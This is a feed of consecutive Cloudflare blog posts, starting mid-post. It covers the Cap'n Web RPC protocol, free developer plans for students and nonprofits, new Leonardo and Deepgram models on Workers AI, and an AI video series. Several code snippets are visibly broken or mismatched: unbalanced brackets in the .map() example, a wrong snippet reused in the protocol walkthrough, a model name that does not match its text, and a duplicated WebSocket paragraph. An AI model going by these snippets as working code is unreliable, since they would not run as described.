Notice the initial call to getMyName() returned a promise, but we used the promise itself as the input to hello(), without awaiting it first. With Cap’n Web, this just works: The client sends a message to the server saying: “Please insert the result of the first call into the parameters of the second.”

Or perhaps the first call returns an object with methods. You can call the methods immediately, without awaiting the first promise, like:

let batch = newHttpBatchRpcSession("https://example.com/api");

// Authencitate the API key, returning a Session object.
let sessionPromise = batch.authenticate(apiKey);

// Get the user's name.
let name = await sessionPromise.whoami();

console.log(name);

This works because the promise returned by a Cap’n Web call is not a regular promise. Instead, it’s a JavaScript Proxy object. Any methods you call on it are interpreted as speculative method calls on the eventual result. These calls are sent to the server immediately, telling the server: “When you finish the call I sent earlier, call this method on what it returns.”

Did you spot the security?

This last example shows an important security pattern enabled by Cap’n Web’s object-capability model.

When we call the authenticate() method, after it has verified the provided API key, it returns an authenticated session object. The client can then make further RPCs on the session object to perform operations that require authorization as that user. The server code might look like this:

class MyApiServer extends RpcTarget {
  authenticate(apiKey) {
    let username = await checkApiKey(apiKey);
    return new AuthenticatedSession(username);
  }
}

class AuthenticatedSession extends RpcTarget {
  constructor(username) {
    super();
    this.username = username;
  }

  whoami() {
    return this.username;
  }

  // ...other methods requiring auth...
}

Here’s what makes this work: It is impossible for the client to “forge” a session object. The only way to get one is to call authenticate(), and have it return successfully.

In most RPC systems, it is not possible for one RPC to return a stub pointing at a new RPC object in this way. Instead, all functions are top-level, and can be called by anyone. In such a traditional RPC system, it would be necessary to pass the API key again to every function call, and check it again on the server each time. Or, you’d need to do authorization outside of the RPC system entirely.

This is a common pain point for WebSockets in particular. Due to the design of the web APIs for WebSocket, you generally cannot use headers nor cookies to authorize them. Instead, authorization must happen in-band, by sending a message over the WebSocket itself. But this can be annoying for RPC protocols, as it means the authentication message is “special” and changes the state of the connection itself, affecting later calls. This breaks the abstraction.

The authenticate() pattern shown above neatly makes authentication fit naturally into the RPC abstraction. It’s even type-safe: you can’t possibly forget to authenticate before calling a method requiring auth, because you wouldn’t have an object on which to make the call. Speaking of type-safety…

TypeScript

If you use TypeScript, Cap’n Web plays nicely with it. You can declare your RPC API once as a TypeScript interface, implement in on the server, and call it on the client:

// Shared interface declaration:
interface MyApi {
  hello(name: string): Promise<string>;
}

// On the client:
let api: RpcStub<MyApi> = newWebSocketRpcSession("wss://example.com/api");

// On the server:
class MyApiServer extends RpcTarget implements MyApi {
  hello(name) {
    return `Hello, ${name}!`
  }
}

Now you get end-to-end type checking, auto-completed method names, and so on.

Note that, as always with TypeScript, no type checks occur at runtime. The RPC system itself does not prevent a malicious client from calling an RPC with parameters of the wrong type. This is, of course, not a problem unique to Cap’n Web – JSON-based APIs have always had this problem. You may wish to use a runtime type-checking system like Zod to solve this. (Meanwhile, we hope to add type checking based directly on TypeScript types in the future.)

An alternative to GraphQL?

If you’ve used GraphQL before, you might notice some similarities. One benefit of GraphQL was to solve the “waterfall” problem of traditional REST APIs by allowing clients to ask for multiple pieces of data in one query. For example, instead of making three sequential HTTP calls:

GET /user
GET /user/friends
GET /user/friends/photos

…you can write one GraphQL query to fetch it all at once.

That’s a big improvement over REST, but GraphQL comes with its own tradeoffs:

  • New language and tooling. You have to adopt GraphQL’s schema language, servers, and client libraries. If your team is all-in on JavaScript, that’s a lot of extra machinery.

  • Limited composability. GraphQL queries are declarative, which makes them great for fetching data, but awkward for chaining operations or mutations. For example, you can’t easily say: “create a user, then immediately use that new user object to make a friend request, all-in-one round trip.”

  • Different abstraction model. GraphQL doesn’t look or feel like the JavaScript APIs you already know. You’re learning a new mental model rather than extending the one you use every day.

How Cap’n Web goes further

Cap’n Web solves the waterfall problem without introducing a new language or ecosystem. It’s just JavaScript. Because Cap’n Web supports promise pipelining and object references, you can write code that looks like this:

let user = api.createUser({ name: "Alice" });
let friendRequest = await user.sendFriendRequest("Bob");

What happens under the hood? Both calls are pipelined into a single network round trip:

  1. Create the user.

  2. Take the result of that call (a new User object).

  3. Immediately invoke sendFriendRequest() on that object.

All of this is expressed naturally in JavaScript, with no schemas, query languages, or special tooling required. You just call methods and pass objects around, like you would in any other JavaScript code.

In other words, GraphQL gave us a way to flatten REST’s waterfalls. Cap’n Web lets us go even further: it gives you the power to model complex interactions exactly the way you would in a normal program, with no impedance mismatch.

But how do we solve arrays?

With everything we’ve presented so far, there’s a critical missing piece to seriously consider Cap’n Web as an alternative to GraphQL: handling lists. Often, GraphQL is used to say: “Perform this query, and then, for every result, perform this other query.” For example: “List the user’s friends, and then for each one, fetch their profile photo.”

In short, we need an array.map() operation that can be performed without adding a round trip.

Cap’n Proto, historically, has never supported such a thing.

But with Cap’n Web, we’ve solved it. You can do:

let user = api.authenticate(token);

// Get the user's list of friends (an array).
let friendsPromise = user.listFriends();

// Do a .map() to annotate each friend record with their photo.
// This operates on the *promise* for the friends list, so does not
// add a round trip.
// (wait WHAT!?!?)
let friendsWithPhotos = friendsPromise.map(friend => {
  return {friend, photo: api.getUserPhoto(friend.id))};
}

// Await the friends list with attached photos -- one round trip!
let results = await friendsWithPhotos;

Wait… How!?

.map() takes a callback function, which needs to be applied to each element in the array. As we described earlier, normally when you pass a function to an RPC, the function is passed “by reference”, meaning that the remote side receives a stub, where calling that stub makes an RPC back to the client where the function was created.

But that is NOT what is happening here. That would defeat the purpose: we don’t want the server to have to round-trip to the client to process every member of the array. We want the server to just apply the transformation server-side.

To that end, .map() is special. It does not send JavaScript code to the server, but it does send something like “code”, restricted to a domain-specific, non-Turing-complete language. The “code” is a list of instructions that the server should carry out for each member of the array. In this case, the instructions are:

  1. Invoke api.getUserPhoto(friend.id).

  2. Return an object {friend, photo}, where friend is the original array element and photo is the result of step 1.

But the application code just specified a JavaScript method. How on Earth could we convert this into the narrow DSL?

The answer is record-replay: On the client side, we execute the callback once, passing in a special placeholder value. The parameter behaves like an RPC promise. However, the callback is required to be synchronous, so it cannot actually await this promise. The only thing it can do is use promise pipelining to make pipelined calls. These calls are intercepted by the implementation and recorded as instructions, which can then be sent to the server, where they can be replayed as needed.

And because the recording is based on promise pipelining, which is what the RPC protocol itself is designed to represent, it turns out that the “DSL” used to represent “instructions” for the map function is just the RPC protocol itself. 🤯

Implementation details

JSON-based serialization

Cap’n Web’s underlying protocol is based on JSON – but with a preprocessing step to handle special types. Arrays are treated as “escape sequences” that let us encode other values. For example, JSON does not have an encoding for Date objects, but Cap’n Web does. You might see a message that looks like this:

{
  event: "Birthday Week",
  timestamp: ["date", 1758499200000]
}

To encode a literal array, we simply double-wrap it in []:

{
  names: [["Alice", "Bob", "Carol"]]
}

In other words, an array with just one element which is itself an array, evaluates to the inner array literally. An array whose first element is a type name, evaluates to an instance of that type, where the remaining elements are parameters to the type.

Note that only a fixed set of types are supported: essentially, “structured clonable” types, and RPC stub types.

On top of this basic encoding, we define an RPC protocol inspired by Cap’n Proto – but greatly simplified.

RPC protocol

Since Cap’n Web is a symmetric protocol, there is no well-defined “client” or “server” at the protocol level. There are just two parties exchanging messages across a connection. Every kind of interaction can happen in either direction.

In order to make it easier to describe these interactions, I will refer to the two parties as “Alice” and “Bob”.

Alice and Bob start the connection by establishing some sort of bidirectional message stream. This may be a WebSocket, but Cap’n Web also allows applications to define their own transports. Each message in the stream is JSON-encoded, as described earlier.

Alice and Bob each maintain some state about the connection. In particular, each maintains an “export table”, describing all the pass-by-reference objects they have exposed to the other side, and an “import table”, describing the references they have received. Alice’s exports correspond to Bob’s imports, and vice versa. Each entry in the export table has a signed integer ID, which is used to reference it. You can think of these IDs like file descriptors in a POSIX system. Unlike file descriptors, though, IDs can be negative, and an ID is never reused over the lifetime of a connection.

At the start of the connection, Alice and Bob each populate their export tables with a single entry, numbered zero, representing their “main” interfaces. Typically, when one side is acting as the “server”, they will export their main public RPC interface as ID zero, whereas the “client” will export an empty interface. However, this is up to the application: either side can export whatever they want.

From there, new exports are added in two ways:

  • When Alice sends a message to Bob that contains within it an object or function reference, Alice adds the target object to her export table. IDs assigned in this case are always negative, starting from -1 and counting downwards.

  • Alice can send a “push” message to Bob to request that Bob add a value to his export table. The “push” message contains an expression which Bob evaluates, exporting the result. Usually, the expression describes a method call on one of Bob’s existing exports – this is how an RPC is made. Each “push” is assigned a positive ID on the export table, starting from 1 and counting upwards. Since positive IDs are only assigned as a result of pushes, Alice can predict the ID of each push she makes, and can immediately use that ID in subsequent messages. This is how promise pipelining is achieved.

After sending a push message, Alice can subsequently send a “pull” message, which tells Bob that once he is done evaluating the “push”, he should proactively serialize the result and send it back to Alice, as a “resolve” (or “reject”) message. However, this is optional: Alice may not actually care to receive the return value of an RPC, if Alice only wants to use it in promise pipelining. In fact, the Cap’n Web implementation will only send a “pull” message if the application has actually awaited the returned promise.

Putting it together, a code sequence like this:

{
  names: [["Alice", "Bob", "Carol"]]
}

Might produce a message exchange like this:

// Call api.getByName(). `api` is the server's main export, so has export ID 0.
-> ["push", ["pipeline", 0, "getMyName", []]
// Call api.hello(namePromise). `namePromise` refers to the result of the first push,
// so has ID 1.
-> ["push", ["pipeline", 0, "hello", [["pipeline", 1]]]]
// Ask that the result of the second push be proactively serialized and returned.
-> ["pull", 2]
// Server responds.
<- ["resolve", 2, "Hello, Alice!"]

For more details about the protocol, check out the docs.

Try it out!

Cap’n Web is new and still highly experimental. There may be bugs to shake out. But, we’re already using it today. Cap’n Web is the basis of the recently-launched “remote bindings” feature in Wrangler, allowing a local test instance of workerd to speak RPC to services in production. We’ve also begun to experiment with it in various frontend applications – expect more blog posts on this in the future.

In any case, Cap’n Web is open source, and you can start using it in your own projects now.

Check it out on GitHub.


Introducing free access to Cloudflare developer features for students

Post Syndicated from Veronica Marin original https://blog.cloudflare.com/workers-for-students/

I can recall countless late nights as a student spent building out ideas that felt like breakthroughs. My own thesis had significant costs associated with the tools and computational resources I needed. The reality for students is that turning ideas into working applications often requires production-grade tools, and having to pay for them can stop a great project before it even starts. We don’t think that cost should stand in the way of building out your ideas.

Cloudflare’s Developer Platform already makes it easy for anyone to go from idea to launch. It gives you all the tools you need in one place to work on that class project, build out your portfolio, and create full-stack applications. We want students to be able to use these tools without worrying about the cost, so starting today, students at least 18 years old in the United States with a verified .edu email can receive 12 months of free access to Cloudflare’s developer features. This is the first step for Cloudflare for Students, and we plan to continue expanding our support for the next generation of builders.


What’s included

12 months of our paid developer features plan at no upfront cost

Eligible student accounts will receive increased usage allotments for our developer features compared to our free plan. That includes Workers, Pages Functions, KV, Containers, Vectorize, Hyperdrive, Durable Objects, Workers Logpush, and Queues. With these, you can build everything from APIs and full-stack apps to data pipelines and websites.

After 12 months, you can easily renew your subscription by upgrading to our Workers Paid plan. If you choose not to, your account will automatically revert to the free plan, and you won’t be charged.

Here’s a look at the increased usage allotments students can receive today. Above those free allotments, our standard usage rates will apply.

Free Plan

Student Accounts (Paid developer features)

Workers

100,000 requests/day

10 million requests/month

+ $.30 per additional million requests

Workers KV

100,000 read operations/day

1,000 write, delete, list operations per day

10 million read operations/month

1 million write, delete, and list operations per month

Hyperdrive

100,000 database queries/day

Unlimited database queries / day

Durable Objects

100,000 requests/day

1 million requests / day

+ $0.15 / per additional million requests

Workers Logs

200,000 log events / day

3 Days of retention

20 million log events / month 

7 Days of retention

+$0.60 per additional million events

Workers Logpush

Not Included

10 million log events / month

+$0.05 per additional million log events

Queues

Not Included

1 million operations/month included 

+$0.40 per additional million operations

Access to a dedicated student developer community

You’ll also have access to a dedicated Discord channel just for students. We want to see what you’re building! This is a place to connect with peers, get support, and share ideas in a community of student developers.

What others have built with Cloudflare’s Developer Platform

Curious about what’s possible with Cloudflare’s developer features? Here are some projects from our community:

by Daniel Foldi


Adventure is a text-based adventure game running on Cloudflare Workers that uses Workers AI to generate the stories with the @cf/google/gemma-3-12b-it model. 

The project’s developer chose Workers AI with the OpenNext adapter because it made deployment simple and handled scaling automatically. It uses the Workers Paid plan mainly to enable Workers Logpush and get access to detailed logs for better monitoring and analysis.

When a new game starts, the server gives the AI a custom prompt to set the scene and explain how the adventure should work. From there, each time the player makes a choice, their story history is sent back to the server, which asks the AI to continue the narrative, allowing the story to evolve dynamically based on the player’s choices.

The code below shows how this logic is implemented:

"use server";
import { getCloudflareContext } from "@opennextjs/cloudflare";

async function prime(env: CloudflareEnv) {
  const id = Math.floor(Math.random() * 1000000);//unique ID for each game run
  const messages = [
    {
      role: "user",
      content:
        `The user is playing a text-based adventure game. Each game is different, this is game ${id}. Your first job is to create a short background story in 3-4 sentences. Scenarios may include interesting locations such as jungles, deserts, caves.
        After the first message, each of your messages will be responses to the user interaction. State three short options (A, B, C). The user responses will be the chosen action. Your responses should end by asking the user about their choice.
        Your message will be shown to the user directly, so avoid "Certainly", "Great", "Let's get started", and other filler content, and avoid bringing up technical details such as "this is game #id".
        The games should have a win condition that is actually feasible given the story, and if the player loses, the message should end with "Try again.".
        `,
    },
  ];
  //Call Workers AI to generate the first response (story intro)
  const { response } = await env.AI.run("@cf/google/gemma-3-12b-it", { messages });

  return [
    ...messages,
    { role: "assistant", content: response }
  ];
}

/**
 * Main server action for the adventure game.
 * If no input yet, it primes the game with the opening story
 * If there is input, it continues the story based on the full history
 * Uses getCloudflareContext from @opennextjs/cloudflare to access env.
 */
export async function adventureAction(input: any[]) {
  let { env } = await getCloudflareContext({ async: true });

  return input.length === 0
  ? await prime(env)
  : [...input,
      { role: "assistant", content: (await env.AI.run("@cf/google/gemma-3-12b-it", { messages: input })).response }
  ];
}

by Matt Cowley


DNS over Discord is a bot that lets you run DNS lookups right inside Discord. Instead of switching to a terminal or online tool, you can use simple slash commands to check records like A, AAAA, MX, TXT, and more.

The developer behind the project chose Cloudflare Workers because it’s a great platform for running small JavaScript apps that handle requests, which made it a good fit for Discord’s slash commands. Since every command translates into a request and the bot sees a lot of traffic, the free tier wasn’t enough, so it now runs on Workers Paid to keep up reliably without hitting request limits.

In this project, the Worker checks if the request is a Discord interaction, and if so, it sends it to the right command (e.g., /dig, /multi-dig, etc.), using a handler that calls out to a custom framework for Discord slash commands. If it’s not from Discord, it can also serve routes like the privacy page or terms of service.

Here’s what that looks like in code:

export default {
  // Process all requests to the Worker
  fetch: async (request, env, ctx) => {
    try {
      // Include the env in the context we pass to the handler
      ctx.env = env;

      // Check if it's a Discord interaction (or a health check)
      const resp = await handler(request, ctx);
      if (resp) return resp;

      // Otherwise, process the request
      const url = new URL(request.url);

      if (request.method === 'GET' && url.pathname === '/privacy')
        return new textResponse(Privacy);

      if (request.method === 'GET' && url.pathname === '/terms')
        return new textResponse(Terms);

      // Fallback if nothing matches
      return new textResponse(null, { status: 404 });
    } catch (err) {
      // Log any errors
      captureException(err);

      // Re-throw the error
      throw err;
    }
  },
};

by James Ross


placeholders.dev is a service that generates placeholder images, making it easy for developers to prototype and scaffold websites without dealing with hosting or asset management. Users can generate placeholders instantly with a simple URL, such as: https://images.placeholders.dev/350x150

Since placeholders are typically used in early development, speed and consistency matter, and images need to load instantly so the workflow isn’t interrupted. Running on Cloudflare Workers makes the service fast and consistent no matter where developers are.

This project uses the Workers Paid plan because it regularly exceeds the free-tier limits on requests and compute time. The Worker below shows the core of how the service works. When a request comes in, it looks at the URL path (like /300x150) to determine the size of the placeholder, applies some defaults for style, and then returns an SVG image on the fly.

export default {
  async fetch(request: Request, env: Env, ctx: ExecutionContext) {
    try {
      const url = new URL(request.url);
      const cache = caches.default;

      // Handle requests for the placeholder API
      if (url.host === 'images.placeholders.dev' || url.pathname.startsWith('/api')) {
        // Try edge cache first
        const cached = await cache.match(url, { ignoreMethod: true });
        if (cached) return cached;

        // Default placeholder options
        const imageOptions: Options = {
   dataUri: false, // always return an unencoded SVG source
          width: 300,
          height: 150,
          fontFamily: 'sans-serif',
          fontWeight: 'bold',
          bgColor: '#ddd',
          textColor: 'rgba(0,0,0,0.5)',
        };

        // Parse sizes from path (e.g. /350 or /350x150)
        const sizeParts = url.pathname.replace('/api', '').replace('/', '').split('x');
        if (sizeParts[0]) {
          const width = sanitizeNumber(parseInt(sizeParts[0], 10));
          const height = sizeParts[1] ? sanitizeNumber(parseInt(sizeParts[1], 10)) : width;
          imageOptions.width = width;
          imageOptions.height = height;
        }

        // Generate SVG placeholder
        const response = new Response(simpleSvgPlaceholder(imageOptions), {
          headers: { 'content-type': 'image/svg+xml; charset=utf-8' },
        });

        // Cache result
        response.headers.set('Cache-Control', 'public, max-age=' + cacheTtl);
        ctx.waitUntil(cache.put(url, response.clone()));

        return response;
      }

      return new Response('Not Found', { status: 404 });
    } catch (err) {
      console.error(err);
      return new Response('Internal Error', { status: 500 });
    }
  },
};

Check out Built With Workers to see what other developers are building with our developer platform.


How do I get started?

This offering is available to United States students at least 18 years old with a verified .edu billing email address.

Based on when your account was created, you can redeem this offer either by signing up for a free Cloudflare account with your .edu email or by filling out a form to request access for your existing .edu account. Just make sure your verified .edu email address is your billing email address.

New .edu accounts

Existing .edu accounts

Creation Date 

Created on/after September 22, 2025

Created prior to September 22, 2025

How to Redeem

Sign up for a free Cloudflare account, add your credit card and ensure your verified .edu email address is added to your billing details.

Ensure your verified .edu email address is added to your billing details.

Fill out our form and a member of our team will help you get access

Note: in order to receive the credit, your verified .edu email address needs to be your billing email address 

Expanding Cloudflare for Students coverage

While our first offering is primarily for institutions in the US, we’re working on expanding support for our students in other countries and plan to add additional higher education domain names after launch. If you’re at an educational institution outside of the United States, please reach out to us and apply for your educational/academic domain to be added. We’ll let you know as soon as it becomes available in your region. Check our Cloudflare for Students page for updates and keep an eye out for emails if you have an account with a newly supported domain.

Whether you’re gearing up for your first hackathon, launching a side project, or looking to build the next big thing, you can get started today with free access and join a global developer community already building on Cloudflare.

Get started by signing up or requesting access today.


Free access to Cloudflare developer services for non-profit and civil society organizations

Post Syndicated from Patrick Day original https://blog.cloudflare.com/expanding-startups-for-nonprofits/

We are excited to announce that non-profit, civil society, and public interest organizations are now eligible to join Cloudflare for Startups. Under this new program, participating organizations will be eligible to receive up to $250,000 in Cloudflare credits — these can be used for a variety of our developer and core products, including databases & storage, compute services, AI, media, and performance and security.

Non-profit organizations and startups have a lot in common. In addition to being powered by small groups of dedicated, resilient, and creative people, they are constantly navigating funding shortages, staffing challenges, and insufficient tools. Most importantly, both are unrelenting in their efforts to do more with less; maximizing the impact of every dollar spent and hour invested.

Cloudflare’s developer services and our startup programs were designed for exactly these challenges. Our goal is to make it easier for anyone to write code, build applications, and launch new ideas anywhere in the world. Put another way, we want to help small teams have a global impact.

All are welcome to apply. The application period for this new program will open today and runs until December 1. After the closing of the application period, Cloudflare will review the applications we’ve received and make award decisions based on project description, requirements, and impact. 

If you are a non-profit organization interested in working with Cloudflare to build new, innovative full-stack applications that are secure, performant, near-infinite scale, and optimized for AI training, inference, and security for free, apply today!

Coming together in a challenging year

2025 has been a difficult year for non-profits. According to a recent survey of non-profit leaders, decreased government funding, an uncertain economic environment, and greater demand for services have made it increasingly difficult for many organizations to operate. Although some private foundations have responded by increasing their grant making and other contributions, significant gaps remain. 

We also know that the non-profit sector has significant tech needs. The Nonprofit Technology Network (NTEN) reports that almost half of non-profits surveyed believed that they spent too little on technology, with 77% reporting the primary barrier was lack of available budget. Only 14% reported receiving grants to specifically help with technology projects. 

Many organizations are facing difficult choices. And, sadly, many have been forced to discontinue operations.

However, we have also seen remarkable resilience and determination first-hand. Many of the organizations we work with regularly are doing the incredibly difficult work of diversifying their funding, reshaping their organizations, and finding new ways to accomplish their missions — including greater emphasis on and investment in new technologies. We also continue to see dynamic growth of new non-profit startups working to step in and fill gaps to help solve problems in new, innovative ways.

We want to help. 

Cloudflare is the place for startups

Cloudflare is the best place on the Internet to build and launch a startup. In part because our developer tools were designed to help small teams build big things. Building on Cloudflare’s network provides direct access to scalable computing power, storage, media, and AI needed to build full-stack applications. And, because applications built with Cloudflare are automatically deployed to our global network, developers can spend less time worrying about infrastructure and performance and more time on their ideas.

More than 4,000 startups have received free credits since Cloudflare launched its startup program during 2024’s Birthday Week. Since 2024, 175 startups in 23 countries have also participated in Cloudflare’s Workers Launchpad Program, which provides even more support and resources including hands-on assistance and training from Cloudflare engineers, introductions to our venture capital partners, and opportunities to present at Cloudflare Demo Days.

Impact organizations are often start-ups, too

Regardless of their size, non-profits and startups often share a similar mentality. They tend to be mission-driven, operate with limited resources, and are constantly forced to innovate and adapt to survive. 

Above all, they rely on small teams to make an outsized impact.

We understand these challenges. Our developer services were designed to allow small teams to focus on ideas and code instead of the time-consuming aspects of managing a global network, security, and scaling. Building directly on the Cloudflare Network allows developers to instantly scale and deploy new technologies all over the world. 

One example of a non-profit organization already building on Cloudflare is Kendraio. An independent non-profit organization that has built an open source, integration platform designed to help others solve problems. Kendraio creates user-friendly tools with customizable interfaces and no-code logic, allowing anyone to build complex functions across different applications. Their work on pilot projects demonstrates this, including a knowledge graph for diplomats working on nuclear disarmament, a shared wholesale database for independent bookstores, and a dashboard to simplify news subscriptions for readers and publishers.

Interested? Here’s how to apply 

The application period to join Cloudflare’s first class of non-profit organizations participating in Cloudflare for Startups is open now, and will close on December 1, 2025.

Cloudflare’s Impact and Startup teams will review the applications and select a cohort of non-profit, civil society, and public interest organizations to participate in the program.  These organizations will have the opportunity to receive up to $250,000 in Cloudflare credits, which can be used for certain usage-based services including databases & storage, compute services, AI, media, and performance & security tools. For full details, visit cloudflare.com/startups

To qualify, organizations should meet the following criteria:

  • Be a registered 501(c)(3) non-profit organization or equivalent

  • Provide a description of the tool you plan to build or scale with Cloudflare. 

Applications for Cloudflare’s first class of non-profit startup participants are open until December 1, 2025. This will be our first non-profit class to join our Startups program. However, we hope there will be more to follow. Keep checking the Cloudflare blog for more updates.

To apply, simply visit our application page and select the non-profit checkbox.

State-of-the-art image generation Leonardo models and text-to-speech Deepgram models now available in Workers AI

Post Syndicated from Michelle Chen original https://blog.cloudflare.com/workers-ai-partner-models/

When we first launched Workers AI, we made a bet that AI models would get faster and smaller. We built our infrastructure around this hypothesis, adding specialized GPUs to our datacenters around the world that can serve inference to users as fast as possible. We created our platform to be as general as possible, but we also identified niche use cases that fit our infrastructure well, such as low-latency image generation or real-time audio voice agents. To lean in on those use cases, we’re bringing on some new models that will help make it easier to develop for these applications.

Today, we’re excited to announce that we are expanding our model catalog to include closed-source partner models that fit this use case. We’ve partnered with Leonardo.Ai and Deepgram to bring their latest and greatest models to Workers AI, hosted on Cloudflare’s infrastructure. Leonardo and Deepgram both have models with a great speed-to-performance ratio that suit the infrastructure of Workers AI. We’re starting off with these great partners — but expect to expand our catalog to other partner models as well.

The benefits of using these models on Workers AI is that we don’t only have a standalone inference service, we also have an entire suite of Developer products that allow you to build whole applications around AI. If you’re building an image generation platform, you could use Workers to host the application logic, Workers AI to generate the images, R2 for storage, and Images for serving and transforming media. If you’re building Realtime voice agents, we offer WebRTC and WebSocket support via Workers, speech-to-text, text-to-speech, and turn detection models via Workers AI, and an orchestration layer via Cloudflare Realtime. All in all, we want to lean into use cases that we think Cloudflare has a unique advantage in, with developer tools to back it up, and make it all available so that you can build the best AI applications on top of our holistic Developer Platform.

Leonardo Models

Leonardo.Ai is a generative AI media lab that trains their own models and hosts a platform for customers to create generative media. The Workers AI team has been working with Leonardo for a while now and have experienced the magic of their image generation models firsthand. We’re excited to bring on two image generation models from Leonardo: @cf/leonardo/phoenix-1.0 and @cf/leonardo/lucid-origin.

“We’re excited to enable Cloudflare customers a new avenue to extend and use our image generation technology in creative ways such as creating character images for gaming, generating personalized images for websites, and a host of other uses… all through the Workers AI and the Cloudflare Developer Platform.” – Peter Runham, CTO, Leonardo.Ai 

The Phoenix model is trained from the ground up by Leonardo, excelling at things like text rendering and prompt coherence. The full image generation request took 4.89s end-to-end for a 25 step, 1024×1024 image.

curl --request POST \
  --url https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/leonardo/draco-1.0 \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: application/json' \
  --data '{
    "prompt": "A 1950s-style neon diner sign glowing at night that reads '\''OPEN 24 HOURS'\'' with chrome details and vintage typography.",
    "width":1024,
    "height":1024,
    "steps": 25,
    "seed":1,
    "guidance": 4,
    "negative_prompt": "bad image, low quality, signature, overexposed, jpeg artifacts, undefined, unclear, Noisy, grainy, oversaturated, overcontrasted"
}'

The Lucid Origin model is a recent addition to Leonardo’s family of models and is great at generating photorealistic images. The image took 4.38s to generate end-to-end at 25 steps and a 1024×1024 image size.

curl --request POST \
  --url https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/leonardo/lucid-origin \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: application/json' \
  --data '{
    "prompt": "A 1950s-style neon diner sign glowing at night that reads '\''OPEN 24 HOURS'\'' with chrome details and vintage typography.",
    "width":1024,
    "height":1024,
    "steps": 25,
    "seed":1,
    "guidance": 4,
    "negative_prompt": "bad image, low quality, signature, overexposed, jpeg artifacts, undefined, unclear, Noisy, grainy, oversaturated, overcontrasted"
}'

Deepgram Models

Deepgram is a voice AI company that develops their own audio models, allowing users to interact with AI through a natural interface for humans: voice. Voice is an exciting interface because it carries higher bandwidth than text, because it has other speech signals like pacing, intonation, and more. The Deepgram models that we’re bringing on our platform are audio models which perform extremely fast speech-to-text and text-to-speech inference. Combined with the Workers AI infrastructure, the models showcase our unique infrastructure so customers can build low-latency voice agents and more.

“By hosting our voice models on Cloudflare’s Workers AI, we’re enabling developers to create real-time, expressive voice agents with ultra-low latency. Cloudflare’s global network brings AI compute closer to users everywhere, so customers can now deliver lightning-fast conversational AI experiences without worrying about complex infrastructure.” – Adam Sypniewski, CTO, Deepgram

@cf/deepgram/nova-3 is a speech-to-text model that can quickly transcribe audio with high accuracy. @cf/deepgram/aura-1 is a text-to-speech model that is context aware and can apply natural pacing and expressiveness based on the input text. The newer Aura 2 model will be available on Workers AI soon. We’ve also improved the experience of sending binary mp3 files to Workers AI, so you don’t have to convert it into an Uint8 array like you had to previously. Along with our Realtime announcements (coming soon!), these audio models are the key to enabling customers to build voice agents directly on Cloudflare.

With the AI binding, a call to the Nova 3 speech-to-text model would look like this:

const URL = "https://www.some-website.com/audio.mp3";
const mp3 = await fetch(URL);
 
const res = await env.AI.run("@cf/deepgram/nova-3", {
    "audio": {
      body: mp3.body,
      contentType: "audio/mpeg"
    },
    "detect_language": true
  });

With the REST API, it would look like this:

curl --request POST \
  --url 'https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/deepgram/nova-3?detect_language=true' \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: audio/mpeg' \
  --data-binary @/path/to/audio.mp3

As well, we’ve added WebSocket support to the Deepgram models, which you can use to keep a connection to the inference server live and use it for bi-directional input and output. To use the Nova model with WebSocket support, it would look like this:

curl --request POST \
  --url 'https://api.cloudflare.com/client/v4/accounts/{ACCOUNT_ID}/ai/run/@cf/deepgram/nova-3?detect_language=true' \
  --header 'Authorization: Bearer {TOKEN}' \
  --header 'Content-Type: audio/mpeg' \
  --data-binary @/path/to/audio.mp3

As well, we’ve added WebSocket support to the Deepgram models, which you can use to keep a connection to the inference server live and use it for bi-directional input and output. To use the Nova model with WebSocket support, check out our Developer Docs.

All the pieces work together so that you can:

  1. Capture audio with Cloudflare Realtime from any WebRTC source

  2. Pipe it via WebSocket to your processing pipeline

  3. Transcribe with audio ML models Deepgram running on Workers AI

  4. Process with your LLM of choice through a model hosted on Workers AI or proxied via AI Gateway

  5. Orchestrate everything with Realtime Agents

Try these models out today

Check out our developer docs for more details, pricing and how to get started with the newest partner models available on Workers AI.

Cloudflare Launching AI Miniseries for Developers (and Everyone Else They Know)

Post Syndicated from Peter Saulitis original https://blog.cloudflare.com/welcome-to-ai-avenue/

If you’re here on the Cloudflare blog, chances are you already understand AI pretty well. But step outside our circle, and you’ll find a surprising number of people who still don’t know what it really is — or why it matters.

We wanted to come up with a way to make AI intuitive, something you can actually see and touch to get what’s going on. Hands on, not just hand-wavy.

The idea we landed on is simple: nothing comes into the world fully formed. Like us, and like the Internet, AI didn’t show up fully formed. So we asked ourselves: what if we told the story of AI as it learns and grows?

Episode by episode, we’d give it new capabilities, explain how those capabilities work, and explore how they change the way AI interacts with the world. Giving it a voice. Letting it see. Helping it learn. And maybe even letting it imagine the future.

So we made AI Avenue, a show where I (Craig) explore the fun, human, and sometimes surprising sides of AI… with a little help from my co-host Yorick, a robot hand with a knack for comic timing and the occasional eye-roll. Together, we travel, talk to incredible people, and get hands-on with AI to show it’s not just something to read about. It’s something you can touch, try, and enjoy.


The idea behind AI Avenue

We wanted to make something that would strip away the jargon and make AI approachable, friendly, and most importantly, fun.

In AI Avenue, we address people’s fears, show them the art of the possible, and highlight the positive human stories where AI is augmenting — not replacing — what people can do. And yes, we even let people touch AI themselves. Also yes, the previous paragraphs “intentionally included” a few em-dashes.

The result? A fast-paced, playful series that mixes demos, interviews, and real-world examples, all showing AI as something you can explore, question, and use in ways that matter to you.

You can sign up now to be notified when each episode drops and learn more about the journey at aiavenue.show.


Who we worked with

We had an absolute blast partnering with some of the most exciting players in the space:

  • Anthropic — on building safe, aligned AI models.

  • Engineered Arts — creators of the humanoid robot Ameca, who makes several appearances throughout the series.

  • ElevenLabs — powering lifelike voice synthesis.

  • HeyGen — creating realistic AI-generated video avatars and translations.

  • Roboflow — enabling computer vision projects with powerful image datasets and tools.

  • Be My Eyes — using AI and volunteers to make the world more accessible for people who are blind or have low vision.

  • Writer — bringing enterprise-grade generative AI into real-world workflows.

Episodes: One Ability at a Time

Across six episodes, we follow Yorick’s upgrades and occasional misadventures as he learns to talk, see, think, and even imagine the future.

Episode 1: Voice — We start in London where Yorick gets his voice and immediately starts chiming in on everything.

Episode 2: Vision — In San Francisco, Yorick tries computer vision for the first time. We watch someone go shopping for the first time.

